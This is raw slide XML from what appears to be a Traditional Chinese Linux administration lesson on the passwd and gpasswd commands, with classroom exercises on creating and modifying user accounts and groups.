              <a:t>組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2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01440" y="1600200"/>
              <a:ext cx="2122920" cy="460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600" y="1536840"/>
                <a:ext cx="215460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677400" y="1685160"/>
              <a:ext cx="2658600" cy="460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661200" y="1621440"/>
                <a:ext cx="269064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605400" y="659520"/>
              <a:ext cx="3017880" cy="131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589560" y="596160"/>
                <a:ext cx="3049560" cy="258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64607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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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48" y="1294479"/>
            <a:ext cx="7405176" cy="465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2493000" y="2143080"/>
              <a:ext cx="636480" cy="644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77160" y="2079360"/>
                <a:ext cx="668160" cy="19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8941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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>asswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令能對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指定帳號的用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>設置密碼，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>用戶能修改系統中所有用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>而普通用戶只能變更自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的密碼。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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>  [ID]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="34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建立密碼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77840" y="1625760"/>
              <a:ext cx="2140200" cy="320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2000" y="1562040"/>
                <a:ext cx="21718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149800" y="3282840"/>
              <a:ext cx="1479960" cy="766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133960" y="3219480"/>
                <a:ext cx="151164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006640" y="3308400"/>
              <a:ext cx="263556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90800" y="3244680"/>
                <a:ext cx="26672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626080" y="3213000"/>
              <a:ext cx="1340280" cy="511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10240" y="3149640"/>
                <a:ext cx="1371960" cy="17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10853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sz="3400" dirty="0" err="1"/>
              <a:t>gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令可以讓某個群組具有一個管理員</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty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使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty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群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r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A  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的主控權交由後面的使用者管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>該群組的管理員</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將某位使用者加入到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>這個群組當中！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-d  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將某位使用者移除出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>這個群組當中。</a:t>
            </a:r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/>
              <a:t>群組管理員功能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95320" y="1530360"/>
              <a:ext cx="1327680" cy="446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79480" y="1467000"/>
                <a:ext cx="135936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333440" y="4375080"/>
              <a:ext cx="34344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17600" y="4311720"/>
                <a:ext cx="3751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371600" y="5238720"/>
              <a:ext cx="27324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55760" y="5175360"/>
                <a:ext cx="3052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390840" y="4362480"/>
              <a:ext cx="1505520" cy="12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75000" y="4299120"/>
                <a:ext cx="15372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4768920" y="4336920"/>
              <a:ext cx="1492560" cy="13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53080" y="4273560"/>
                <a:ext cx="15242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184480" y="4235400"/>
              <a:ext cx="304920" cy="385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68640" y="4172040"/>
                <a:ext cx="3369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994040" y="5219640"/>
              <a:ext cx="444600" cy="19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978200" y="5156280"/>
                <a:ext cx="4762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048120" y="5194440"/>
              <a:ext cx="1974960" cy="637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032280" y="5130720"/>
                <a:ext cx="20066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4813200" y="5149800"/>
              <a:ext cx="1524600" cy="129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797360" y="5086440"/>
                <a:ext cx="155628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7171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gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令可以讓某個群組具有一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>管理員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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty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/>
              <a:t>使用者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群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/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 smtClean="0"/>
              <a:t>-M  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將某些帳號加入這個群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>當中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r  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>移除。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-R  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的密碼欄失效</a:t>
            </a:r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/>
              <a:t>群組管理員功能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95320" y="1530360"/>
              <a:ext cx="1327680" cy="446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79480" y="1467000"/>
                <a:ext cx="135936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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2184480" y="4235400"/>
              <a:ext cx="304920" cy="385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68640" y="4172040"/>
                <a:ext cx="336960" cy="165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925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100" dirty="0"/>
              <a:t>如何增加帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>csie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>，且設定初始群組為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>如何增加帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>csii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>且指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>UID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>510</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>？  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>如何增加帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>csib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>設定群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>組為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>test(GID:511 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>如何增加帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>csil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>且不要建立使用者家目錄？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100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4696200" y="2606040"/>
              <a:ext cx="1437120" cy="198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80360" y="2542680"/>
                <a:ext cx="1468800" cy="14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7398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481328"/>
            <a:ext cx="8363272" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>如何修改用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>csie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的初始群組為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>cyut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>？ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改用戶帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>csie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>的次要群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>組為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>cyuu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>？ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改用戶帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>csie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的帳號名稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>？ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如何修改用戶帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>csii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>UID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>560</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>？ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>建立一個使用者為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>csiw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，但不建立家目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>將使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>csiw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>恢復成有家目錄的使用者，指定家目錄名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>csiw1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r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066680" y="793800"/>
              <a:ext cx="1181520" cy="10926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0840" y="730080"/>
                <a:ext cx="1213200" cy="121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835280" y="1848240"/>
              <a:ext cx="1176120" cy="201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819440" y="1784880"/>
                <a:ext cx="12078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5702040" y="1776600"/>
              <a:ext cx="1672200" cy="33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686200" y="1712880"/>
                <a:ext cx="170388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604120" y="2325240"/>
              <a:ext cx="122832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588280" y="2261520"/>
                <a:ext cx="12600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708520" y="2926080"/>
              <a:ext cx="1306800" cy="19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692680" y="2862720"/>
                <a:ext cx="13384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597640" y="3389760"/>
              <a:ext cx="607680" cy="201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581440" y="3326400"/>
                <a:ext cx="6397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780520" y="4160520"/>
              <a:ext cx="2632320" cy="198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764320" y="4097160"/>
                <a:ext cx="2664360" cy="14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0737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sz="3200" dirty="0"/>
              <a:t>建立三個使用者分別為：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'Alan'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>520</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'Andy'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>521</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'Aries'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>530 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 smtClean="0"/>
              <a:t>建立兩個群組為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>steven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>設為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”540”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ Bard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>系統指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>)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 smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ Bard’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>組修改為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Bol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>只將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ Alan’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>刪除，保留家目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ Andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’ </a:t>
